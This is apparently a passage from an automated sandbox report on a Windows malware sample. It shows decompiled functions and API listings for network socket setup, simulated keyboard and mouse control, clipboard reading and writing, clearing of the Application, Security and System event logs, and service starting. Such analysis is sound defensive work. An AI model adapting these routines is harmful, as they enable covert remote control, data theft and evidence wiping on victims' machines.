															_t228 = _v32;
															E04ED2650(_t228, _t281, _v20, _t270, _v36, _t269);
															_t154 = _v32;
															__eflags =  *(_t154 + 0x4c);
															if( *(_t154 + 0x4c) == 0) {
																_t228 = _v36;
																__eflags =  *_t228 - 2;
																_t156 =  !=  ? 0x1c : 0x10;
																__imp__#4( *(_t270 + 0x88), _t228, 0x10);
																__eflags = 0x10 - 0xffffffff;
																if(0x10 == 0xffffffff) {
																	__imp__#111();
																	goto L63;
																} else {
																	_t163 =  &_v20;
																	_v20 = 1;
																	__imp__#10( *(_t270 + 0x88), 0x8004667e, _t163);
																	__eflags = _t163;
																	if(_t163 != 0) {
																		goto L70;
																	} else {
																		_t174 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t163);
																		__eflags = _t174;
																		if(_t174 == 0) {
																			goto L55;
																		} else {
																			 *(_t270 + 0x48) = 1;
																			_t175 = E04ED1D30(_v32, _t270);
																			__eflags = _t175 - 2;
																			if(_t175 == 2) {
																				_t176 = GetLastError();
																				__eflags = _t176;
																				_t156 =  ==  ? 0x4c7 : _t176;
																				goto L63;
																			} else {
																				_t156 = E04ED3700(_t214, _v32, _t270, _t281, _t270, _t214);
																				_t229 = 0;
																			}
																		}
																		goto L64;
																	}
																}
															} else {
																_t177 =  &_v24;
																_v24 = 1;
																__imp__#10( *(_t270 + 0x88), 0x8004667e, _t177);
																__eflags = _t177;
																if(_t177 != 0) {
																	_push(0x80004005);
																	E04EB7AB0();
																	L70:
																	E04EB7AB0();
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_t294 = _t297;
																	_t165 =  *0x4f03008; // 0x3d21fb31
																	_v208 = _t165 ^ _t294;
																	_t257 = _v184;
																	__eflags = _t257;
																	_t283 = _v192;
																	_v216 = _v188;
																	_t169 =  ==  ? _t283 : _t283 + _t257;
																	_v212 =  ==  ? _t283 : _t283 + _t257;
																	 *((intOrPtr*)( *_t228 + 8))( &_v216, 1, _t281, _t293, 0x80004005);
																	__eflags = _v208 ^ _t294;
																	return E04ED572E(_v208 ^ _t294, _v196);
																} else {
																	_t180 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t177);
																	__eflags = _t180;
																	if(_t180 == 0) {
																		L55:
																		_t156 = GetLastError();
																	} else {
																		_t156 = E04ECD1A0( *((intOrPtr*)(_v32 + 0x40)),  *(_t270 + 0x88), _v36, _t214);
																	}
																	L63:
																	_t229 = 1;
																	L64:
																	_v28 = _t156;
																	__eflags = _t156;
																	if(_t156 != 0) {
																		__eflags = _t229;
																		if(_t229 != 0) {
																			E04ED2560(_v32, _t270, 0, 0, 0);
																			_t160 = E04ECC570(_v32 + 0xb0, _t214);
																			__eflags = _t160;
																			if(_t160 == 0) {
																				HeapFree( *( *(_t214 + 0x14)), _t160, _t214);
																			}
																		}
																	}
																	LeaveCriticalSection(_t281);
																	__eflags = _v16 ^ _t293;
																	return E04ED572E(_v16 ^ _t293);
																}
															}
														} else {
															_t185 = _t213 - 1;
															_t261 = _t185 %  *_t279;
															_t225 =  *( *((intOrPtr*)(_t279 + 0x44)) + _t261) & 0x000000ff;
															__eflags = _t185 /  *_t279 - _t225;
															if(_t185 /  *_t279 != _t225) {
																goto L47;
															} else {
																__eflags =  *((intOrPtr*)(_t268 + _t261 * 4)) - 1;
																if( *((intOrPtr*)(_t268 + _t261 * 4)) != 1) {
																	goto L47;
																} else {
																	_t296 = _t296 - 8;
																	_t225 = _t279;
																	_t187 = E04ED4DE0(_t213, _t225, _t268, _t279, _t213, 0);
																	__eflags = _t187;
																	if(_t187 == 0) {
																		goto L47;
																	} else {
																		_t188 = GetLastError();
																		__eflags = _t188;
																		_t189 =  ==  ? 0x4c7 : _t188;
																		return  ==  ? 0x4c7 : _t188;
																	}
																}
															}
														}
													}
												} else {
													return 0x4d6;
												}
											} else {
												goto L23;
											}
										}
									}
								} else {
									__imp__#111();
									L33:
									_t210 = _t131;
									L34:
									goto L35;
								}
							}
						}
					} else {
						__eflags =  *_t209;
						if( *_t209 == 0) {
							goto L9;
						} else {
							E04EF1730();
							_t278 = _t296;
							 *_t278 = E04ECCC60(_t209, _t278);
							_t206 = E04ECCD10(_t209, 0, _t265, _t278, _t278);
							_t296 = _t296 + 4;
							__eflags = _t206;
							if(_t206 != 0) {
								goto L9;
							} else {
								__imp__#111();
								goto L35;
							}
						}
					}
				} else {
					L35:
					return E04ED572E(_v8 ^ _t291);
				}
			}































































































                                                                                    0x04ed39e6
                                                                                    0x04ed39ed
                                                                                    0x04ed39f3
                                                                                    0x04ed39f4
                                                                                    0x04ed39f7
                                                                                    0x04ed39f8
                                                                                    0x04ed39fa
                                                                                    0x04ed3a00
                                                                                    0x04ed3a05
                                                                                    0x04ed3a06
                                                                                    0x04ed3a09
                                                                                    0x04ed3a0c
                                                                                    0x04ed3a11
                                                                                    0x04ed3a14
                                                                                    0x04ed3a17
                                                                                    0x04ed3a1a
                                                                                    0x04ed3a1e
                                                                                    0x04ed3a27
                                                                                    0x04ed3a20
                                                                                    0x04ed3a20
                                                                                    0x04ed3a20
                                                                                    0x04ed3a2c
                                                                                    0x04ed3a31
                                                                                    0x04ed3a3d
                                                                                    0x04ed3a40
                                                                                    0x04ed3a42
                                                                                    0x04ed3a7c
                                                                                    0x04ed3a7c
                                                                                    0x04ed3a7f
                                                                                    0x04ed3a82
                                                                                    0x04ed3ab7
                                                                                    0x04ed3ab7
                                                                                    0x04ed3abe
                                                                                    0x04ed3ac1
                                                                                    0x00000000
                                                                                    0x04ed3ac3
                                                                                    0x00000000
                                                                                    0x04ed3ac3
                                                                                    0x04ed3a84
                                                                                    0x04ed3a84
                                                                                    0x04ed3a87
                                                                                    0x00000000
                                                                                    0x04ed3a89
                                                                                    0x04ed3a89
                                                                                    0x04ed3a90
                                                                                    0x04ed3a90
                                                                                    0x04ed3a93
                                                                                    0x04ed3a9a
                                                                                    0x04ed3aa0
                                                                                    0x04ed3aa2
                                                                                    0x04ed3aa5
                                                                                    0x04ed3aa7
                                                                                    0x04ed3aaa
                                                                                    0x04ed3acd
                                                                                    0x04ed3ad3
                                                                                    0x04ed3ad5
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ae3
                                                                                    0x04ed3ad7
                                                                                    0x04ed3ad7
                                                                                    0x04ed3ada
                                                                                    0x00000000
                                                                                    0x04ed3adc
                                                                                    0x04ed3adc
                                                                                    0x04ed3adc
                                                                                    0x04ed3ada
                                                                                    0x04ed3ae9
                                                                                    0x04ed3af2
                                                                                    0x04ed3aff
                                                                                    0x04ed3b02
                                                                                    0x04ed3b0c
                                                                                    0x04ed3b12
                                                                                    0x04ed3b15
                                                                                    0x04ed3b2d
                                                                                    0x04ed3b33
                                                                                    0x04ed3b38
                                                                                    0x04ed3b3d
                                                                                    0x04ed3b40
                                                                                    0x00000000
                                                                                    0x04ed3b46
                                                                                    0x04ed3b46
                                                                                    0x04ed3b49
                                                                                    0x04ed3b4c
                                                                                    0x04ed3b79
                                                                                    0x04ed3b7c
                                                                                    0x04ed3b7e
                                                                                    0x04ed3b8c
                                                                                    0x04ed3b8c
                                                                                    0x04ed3b8f
                                                                                    0x04ed3b92
                                                                                    0x04ed3b92
                                                                                    0x04ed3b96
                                                                                    0x04ed3b9a
                                                                                    0x04ed3b9d
                                                                                    0x04ed3ba2
                                                                                    0x04ed3ba7
                                                                                    0x04ed3bad
                                                                                    0x04ed3bb7
                                                                                    0x04ed3bc0
                                                                                    0x04ed3bc3
                                                                                    0x04ed3bc7
                                                                                    0x04ed3b4e
                                                                                    0x04ed3b4e
                                                                                    0x04ed3b51
                                                                                    0x04ed3b53
                                                                                    0x04ed3b61
                                                                                    0x04ed3b61
                                                                                    0x04ed3b64
                                                                                    0x04ed3b72
                                                                                    0x04ed3b75
                                                                                    0x04ed3b76
                                                                                    0x04ed3b76
                                                                                    0x04ed3bc8
                                                                                    0x04ed3bcd
                                                                                    0x04ed3bd3
                                                                                    0x04ed3bd6
                                                                                    0x04ed3bdd
                                                                                    0x00000000
                                                                                    0x04ed3bdd
                                                                                    0x00000000
                                                                                    0x04ed3bd6
                                                                                    0x04ed3b17
                                                                                    0x04ed3b17
                                                                                    0x04ed3b1d
                                                                                    0x04ed3b22
                                                                                    0x00000000
                                                                                    0x04ed3b24
                                                                                    0x04ed3b24
                                                                                    0x04ed3b27
                                                                                    0x04ed3bf9
                                                                                    0x04ed3bfe
                                                                                    0x04ed3c03
                                                                                    0x04ed3c03
                                                                                    0x04ed3c08
                                                                                    0x04ed3c0d
                                                                                    0x04ed3c0e
                                                                                    0x04ed3c0f
                                                                                    0x04ed3c10
                                                                                    0x04ed3c11
                                                                                    0x04ed3c13
                                                                                    0x04ed3c14
                                                                                    0x04ed3c15
                                                                                    0x04ed3c17
                                                                                    0x04ed3c18
                                                                                    0x04ed3c1c
                                                                                    0x04ed3c25
                                                                                    0x04ed3c2a
                                                                                    0x04ed3c2c
                                                                                    0x04ed3c3c
                                                                                    0x04ed3c47
                                                                                    0x04ed3c4b
                                                                                    0x04ed3c51
                                                                                    0x04ed3c54
                                                                                    0x04ed3ca1
                                                                                    0x04ed3ca5
                                                                                    0x04ed3c56
                                                                                    0x04ed3c56
                                                                                    0x04ed3c58
                                                                                    0x04ed3c5b
                                                                                    0x04ed3c5d
                                                                                    0x04ed3ca8
                                                                                    0x04ed3ca8
                                                                                    0x04ed3cad
                                                                                    0x04ed3cb2
                                                                                    0x04ed3cb3
                                                                                    0x04ed3cb4
                                                                                    0x04ed3cb5
                                                                                    0x04ed3cb6
                                                                                    0x04ed3cb7
                                                                                    0x04ed3cb8
                                                                                    0x04ed3cb9
                                                                                    0x04ed3cba
                                                                                    0x04ed3cbb
                                                                                    0x04ed3cbc
                                                                                    0x04ed3cbd
                                                                                    0x04ed3cbe
                                                                                    0x04ed3cbf
                                                                                    0x04ed3cc0
                                                                                    0x04ed3cc1
                                                                                    0x04ed3cc3
                                                                                    0x04ed3cc6
                                                                                    0x04ed3ccd
                                                                                    0x04ed3cd3
                                                                                    0x04ed3cd4
                                                                                    0x04ed3cd5
                                                                                    0x04ed3cdb
                                                                                    0x04ed3cdc
                                                                                    0x04ed3cde
                                                                                    0x04ed3ce4
                                                                                    0x04ed3cf1
                                                                                    0x04ed3cf4
                                                                                    0x04ed3d00
                                                                                    0x04ed3d02
                                                                                    0x04ed3d35
                                                                                    0x04ed3d04
                                                                                    0x04ed3d04
                                                                                    0x04ed3d1c
                                                                                    0x04ed3d24
                                                                                    0x04ed3d27
                                                                                    0x04ed3d2a
                                                                                    0x04ed3d2d
                                                                                    0x04ed3d30
                                                                                    0x04ed3d30
                                                                                    0x04ed3d38
                                                                                    0x04ed3d3b
                                                                                    0x04ed3d40
                                                                                    0x04ed3d43
                                                                                    0x04ed3d46
                                                                                    0x04ed3d4d
                                                                                    0x04ed3d57
                                                                                    0x04ed3d5f
                                                                                    0x04ed3d61
                                                                                    0x04ed3d61
                                                                                    0x04ed3d65
                                                                                    0x04ed3d6b
                                                                                    0x04ed3d72
                                                                                    0x04ed3d79
                                                                                    0x04ed3d7e
                                                                                    0x04ed3d81
                                                                                    0x04ed3d85
                                                                                    0x04ed3deb
                                                                                    0x04ed3df8
                                                                                    0x04ed3dfc
                                                                                    0x04ed3e07
                                                                                    0x04ed3e0d
                                                                                    0x04ed3e10
                                                                                    0x04ed3e83
                                                                                    0x00000000
                                                                                    0x04ed3e12
                                                                                    0x04ed3e12
                                                                                    0x04ed3e15
                                                                                    0x04ed3e28
                                                                                    0x04ed3e2e
                                                                                    0x04ed3e30
                                                                                    0x00000000
                                                                                    0x04ed3e36
                                                                                    0x04ed3e44
                                                                                    0x04ed3e4a
                                                                                    0x04ed3e4c
                                                                                    0x00000000
                                                                                    0x04ed3e4e
                                                                                    0x04ed3e52
                                                                                    0x04ed3e59
                                                                                    0x04ed3e5e
                                                                                    0x04ed3e61
                                                                                    0x04ed3e71
                                                                                    0x04ed3e77
                                                                                    0x04ed3e7e
                                                                                    0x00000000
                                                                                    0x04ed3e63
                                                                                    0x04ed3e68
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e61
                                                                                    0x00000000
                                                                                    0x04ed3e4c
                                                                                    0x04ed3e30
                                                                                    0x04ed3d87
                                                                                    0x04ed3d87
                                                                                    0x04ed3d8a
                                                                                    0x04ed3d9d
                                                                                    0x04ed3da3
                                                                                    0x04ed3da5
                                                                                    0x04ed3ee4
                                                                                    0x04ed3ee9
                                                                                    0x04ed3eee
                                                                                    0x04ed3ef3
                                                                                    0x04ed3ef8
                                                                                    0x04ed3ef9
                                                                                    0x04ed3efa
                                                                                    0x04ed3efb
                                                                                    0x04ed3efc
                                                                                    0x04ed3efd
                                                                                    0x04ed3efe
                                                                                    0x04ed3eff
                                                                                    0x04ed3f01
                                                                                    0x04ed3f06
                                                                                    0x04ed3f0d
                                                                                    0x04ed3f10
                                                                                    0x04ed3f13
                                                                                    0x04ed3f19
                                                                                    0x04ed3f1c
                                                                                    0x04ed3f24
                                                                                    0x04ed3f2a
                                                                                    0x04ed3f33
                                                                                    0x04ed3f39
                                                                                    0x04ed3f44
                                                                                    0x04ed3dab
                                                                                    0x04ed3db9
                                                                                    0x04ed3dbf
                                                                                    0x04ed3dc1
                                                                                    0x04ed3de0
                                                                                    0x04ed3de0
                                                                                    0x04ed3dc3
                                                                                    0x04ed3dd3
                                                                                    0x04ed3dd8
                                                                                    0x04ed3e89
                                                                                    0x04ed3e89
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e91
                                                                                    0x04ed3e93
                                                                                    0x04ed3e95
                                                                                    0x04ed3e97
                                                                                    0x04ed3ea5
                                                                                    0x04ed3eb1
                                                                                    0x04ed3eb6
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec1
                                                                                    0x04ed3ec1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3e97
                                                                                    0x04ed3ec8
                                                                                    0x04ed3ed4
                                                                                    0x04ed3ee1
                                                                                    0x04ed3ee1
                                                                                    0x04ed3da5
                                                                                    0x04ed3c5f
                                                                                    0x04ed3c64
                                                                                    0x04ed3c67
                                                                                    0x04ed3c69
                                                                                    0x04ed3c6d
                                                                                    0x04ed3c6f
                                                                                    0x00000000
                                                                                    0x04ed3c71
                                                                                    0x04ed3c71
                                                                                    0x04ed3c75
                                                                                    0x00000000
                                                                                    0x04ed3c77
                                                                                    0x04ed3c77
                                                                                    0x04ed3c7a
                                                                                    0x04ed3c7f
                                                                                    0x04ed3c84
                                                                                    0x04ed3c86
                                                                                    0x00000000
                                                                                    0x04ed3c88
                                                                                    0x04ed3c88
                                                                                    0x04ed3c8f
                                                                                    0x04ed3c97
                                                                                    0x04ed3c9c
                                                                                    0x04ed3c9c
                                                                                    0x04ed3c86
                                                                                    0x04ed3c75
                                                                                    0x04ed3c6f
                                                                                    0x04ed3c5d
                                                                                    0x04ed3c2e
                                                                                    0x04ed3c37
                                                                                    0x04ed3c37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed3b27
                                                                                    0x04ed3b22
                                                                                    0x04ed3aac
                                                                                    0x04ed3aac
                                                                                    0x04ed3bdf
                                                                                    0x04ed3bdf
                                                                                    0x04ed3be1
                                                                                    0x00000000
                                                                                    0x04ed3be1
                                                                                    0x04ed3aaa
                                                                                    0x04ed3a87
                                                                                    0x04ed3a44
                                                                                    0x04ed3a44
                                                                                    0x04ed3a48
                                                                                    0x00000000
                                                                                    0x04ed3a4a
                                                                                    0x04ed3a4f
                                                                                    0x04ed3a56
                                                                                    0x04ed3a60
                                                                                    0x04ed3a65
                                                                                    0x04ed3a6a
                                                                                    0x04ed3a6d
                                                                                    0x04ed3a6f
                                                                                    0x00000000
                                                                                    0x04ed3a71
                                                                                    0x04ed3a71
                                                                                    0x00000000
                                                                                    0x04ed3a71
                                                                                    0x04ed3a6f
                                                                                    0x04ed3a48
                                                                                    0x04ed3a33
                                                                                    0x04ed3be3
                                                                                    0x04ed3bf6
                                                                                    0x04ed3bf6

                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04ED3976,?,?,?,?,FFFFFFFF,?), ref: 04ED3A71
                                                                                    • socket.WS2_32(00000000,00000001,00000006), ref: 04ED3A9A
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED3AAC
                                                                                      • Part of subcall function 04ECCD10: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 04ECCD6F
                                                                                      • Part of subcall function 04ECCD10: htons.WS2_32 ref: 04ECCD7F
                                                                                    • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04ED3B0C
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED3B17
                                                                                    • bind.WS2_32(?,00000002,0000001C), ref: 04ED3BCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$AddressIoctlStringbindhtonssocket
                                                                                    • String ID:
                                                                                    • API String ID: 1590887309-0
                                                                                    • Opcode ID: a73037f6ae8a8b5e12cb58f2a6384d58a61d783d163d62f63dc9d71bebb3f042
                                                                                    • Instruction ID: 2a03ef1984f9c19b77e8963fa5895a82d024bc5a08627299ea6a5ca5bef2cc00
                                                                                    • Opcode Fuzzy Hash: a73037f6ae8a8b5e12cb58f2a6384d58a61d783d163d62f63dc9d71bebb3f042
                                                                                    • Instruction Fuzzy Hash: 54618474F00208ABEB24DF68D880BAE77B1EF84314F10612AFD55A7290E775BD42DB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC2050, Relevance: 10.7, APIs: 7, Instructions: 158keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • SetCursorPos.USER32(?,7697ADB0,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20E7
                                                                                    • WindowFromPoint.USER32(?,7697ADB0,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20EF
                                                                                    • SetCapture.USER32(00000000,?,?,?,?,?,04EC1D89,?,?), ref: 04EC20F6
                                                                                    • keybd_event.USER32 ref: 04EC213B
                                                                                    • mouse_event.USER32 ref: 04EC21EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpimouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 3538182014-0
                                                                                    • Opcode ID: 4f0061bacc8e8e6264abf94bc24e6ef66a93f9c79be5c8aca09fe3cd9e0dd994
                                                                                    • Instruction ID: 7cbbc88184a7e9154a9e78c049c43aec932b3bf329c0fe245e612bf976b85797
                                                                                    • Opcode Fuzzy Hash: 4f0061bacc8e8e6264abf94bc24e6ef66a93f9c79be5c8aca09fe3cd9e0dd994
                                                                                    • Instruction Fuzzy Hash: 6E51E231BC0300BBF7318AA59D4BF557A59DB85F11F304286FB05BF2C5E6E4B9428668
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB7500, Relevance: 10.6, APIs: 7, Instructions: 58clipboardCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 47%
                                                                                    			E04EB7500(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v12;
				void* __esi;
				int _t9;
				void* _t13;
				void* _t21;
				void* _t25;
				void* _t29;
				void* _t31;
				char* _t32;

				_t23 = __ecx;
				_v12 = __ecx;
				_t9 = OpenClipboard(0);
				if(_t9 == 0) {
					return _t9;
				}
				if(IsClipboardFormatAvailable(0xd) != 0) {
					_t21 = GetClipboardData(0xd);
					if(_t21 != 0) {
						_t13 = GlobalLock(_t21);
						_v8 = _t13;
						_t40 = _t13;
						if(_t13 != 0) {
							_push(_t31);
							_t3 = GlobalSize(_t21) + 1; // 0x1
							_t29 = _t3;
							_push(_t29);
							_t32 = E04ED5785(_t23, _t31, _t40);
							_t4 = _t29 - 1; // 0x0
							_t6 = _t32 + 1; // 0x1
							_t25 = _t6;
							 *_t32 = 0x79;
							E04EDDC90(_t25, _v8, _t4);
							GlobalUnlock(_t21);
							_push(_t25);
							_push(0x3f);
							_push(_t29);
							_push(_t32);
							E04EB1C60( *((intOrPtr*)(_v12 + 4)));
							E04ED573F(_t32);
						}
					}
				}
				return CloseClipboard();
			}













                                                                                    0x04eb7500
                                                                                    0x04eb7508
                                                                                    0x04eb750b
                                                                                    0x04eb7513
                                                                                    0x04eb7594
                                                                                    0x04eb7594
                                                                                    0x04eb751f
                                                                                    0x04eb752a
                                                                                    0x04eb752e
                                                                                    0x04eb7531
                                                                                    0x04eb7537
                                                                                    0x04eb753a
                                                                                    0x04eb753c
                                                                                    0x04eb753e
                                                                                    0x04eb7547
                                                                                    0x04eb7547
                                                                                    0x04eb754a
                                                                                    0x04eb7550
                                                                                    0x04eb7552
                                                                                    0x04eb7559
                                                                                    0x04eb7559
                                                                                    0x04eb755c
                                                                                    0x04eb7560
                                                                                    0x04eb7569
                                                                                    0x04eb756f
                                                                                    0x04eb7573
                                                                                    0x04eb7575
                                                                                    0x04eb7576
                                                                                    0x04eb757a
                                                                                    0x04eb7580
                                                                                    0x04eb7589
                                                                                    0x04eb753c
                                                                                    0x04eb758a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • OpenClipboard.USER32(00000000), ref: 04EB750B
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 04EB7517
                                                                                    • GetClipboardData.USER32 ref: 04EB7524
                                                                                    • GlobalLock.KERNEL32 ref: 04EB7531
                                                                                    • GlobalSize.KERNEL32(00000000), ref: 04EB7541
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 04EB7569
                                                                                    • CloseClipboard.USER32 ref: 04EB758B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AvailableCloseDataFormatLockOpenSizeUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2900998456-0
                                                                                    • Opcode ID: b0e7fc15170cb3a64d7e56c5567fa747b87e4452ecd8aa34e098ed73894d5ed6
                                                                                    • Instruction ID: 28430f74df74a1cd26ca3b118ee6e37bf8e1b58230eb2c17a4780b7e7a7656ed
                                                                                    • Opcode Fuzzy Hash: b0e7fc15170cb3a64d7e56c5567fa747b87e4452ecd8aa34e098ed73894d5ed6
                                                                                    • Instruction Fuzzy Hash: 6511E935A00306BBE7116FB19C48E5B7B7CDF84306F001269F94696141EE39E905C7A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA010, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenEventLogA.ADVAPI32(00000000,04EFD100), ref: 04EBA046
                                                                                    • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 04EBA055
                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 04EBA058
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$ClearCloseOpen
                                                                                    • String ID: Application$Security$System
                                                                                    • API String ID: 1391105993-2169399579
                                                                                    • Opcode ID: dd468b491e667213e721c6a10641567ad7f7ab629dece82405878bb4e7d6b771
                                                                                    • Instruction ID: b0c1e41880437396bbb77519d8f8af0d5bf7ea304c629e1d0075f5ff14cdf3f8
                                                                                    • Opcode Fuzzy Hash: dd468b491e667213e721c6a10641567ad7f7ab629dece82405878bb4e7d6b771
                                                                                    • Instruction Fuzzy Hash: 27F0F63590020CBBDB01AF59AC89BBFFBB8FBC4601F00015DED0553244CA34AC018B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB74A0, Relevance: 10.5, APIs: 7, Instructions: 32clipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(00000000), ref: 04EB74A5
                                                                                    • EmptyClipboard.USER32(?,?,04EB6D7A,?,?), ref: 04EB74B0
                                                                                    • GlobalAlloc.KERNEL32(00000002,?,?,?,04EB6D7A,?,?), ref: 04EB74BB
                                                                                    • GlobalLock.KERNEL32 ref: 04EB74C8
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 04EB74E2
                                                                                    • SetClipboardData.USER32 ref: 04EB74EB
                                                                                    • CloseClipboard.USER32 ref: 04EB74F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 1677084743-0
                                                                                    • Opcode ID: d6ec75f1310cf147f2689d16409409ced0315ae0650a0e28a5b71e3d740ab10a
                                                                                    • Instruction ID: 6d71a55e17520cd9d010bb13648b436509c689f21bec87a50a4bf667506b6a10
                                                                                    • Opcode Fuzzy Hash: d6ec75f1310cf147f2689d16409409ced0315ae0650a0e28a5b71e3d740ab10a
                                                                                    • Instruction Fuzzy Hash: D9F05832601521BBDB122BE2AC0DB8A7F2CEF85793F008011FE4998144DB3ADA00CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3710, Relevance: 9.1, APIs: 6, Instructions: 56serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC372E
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 04EC373E
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 04EC374F
                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04EC376B
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC377C
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC3783
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                                                    • String ID:
                                                                                    • API String ID: 2710452061-0
                                                                                    • Opcode ID: 8f35886093b0a26288f9a9a87131d5efb634a41027edb430d3b4182ea2767cdc
                                                                                    • Instruction ID: e2953d4014f3519196db0202b690ec68a4b5aa4d9a18edf687dc642f12613776
                                                                                    • Opcode Fuzzy Hash: 8f35886093b0a26288f9a9a87131d5efb634a41027edb430d3b4182ea2767cdc
                                                                                    • Instruction Fuzzy Hash: 3101D231701204BBD7205A669D88F7BB6BCDF89B52F00002EFD06D2240DE68EC0586A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB540, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EBAE50: InitializeSecurityDescriptor.ADVAPI32(04EBB5ED,00000001,74E5F560,74E06490), ref: 04EBAE7F
                                                                                      • Part of subcall function 04EBAE50: AllocateAndInitializeSid.ADVAPI32(04EBB56F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EBAE9B
                                                                                      • Part of subcall function 04EBAE50: GetLengthSid.ADVAPI32(00000000,74E06620), ref: 04EBAEA9
                                                                                      • Part of subcall function 04EBAE50: GetProcessHeap.KERNEL32(00000008,00000010), ref: 04EBAEB5
                                                                                      • Part of subcall function 04EBAE50: HeapAlloc.KERNEL32(00000000), ref: 04EBAEBC
                                                                                      • Part of subcall function 04EBAE50: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 04EBAECC
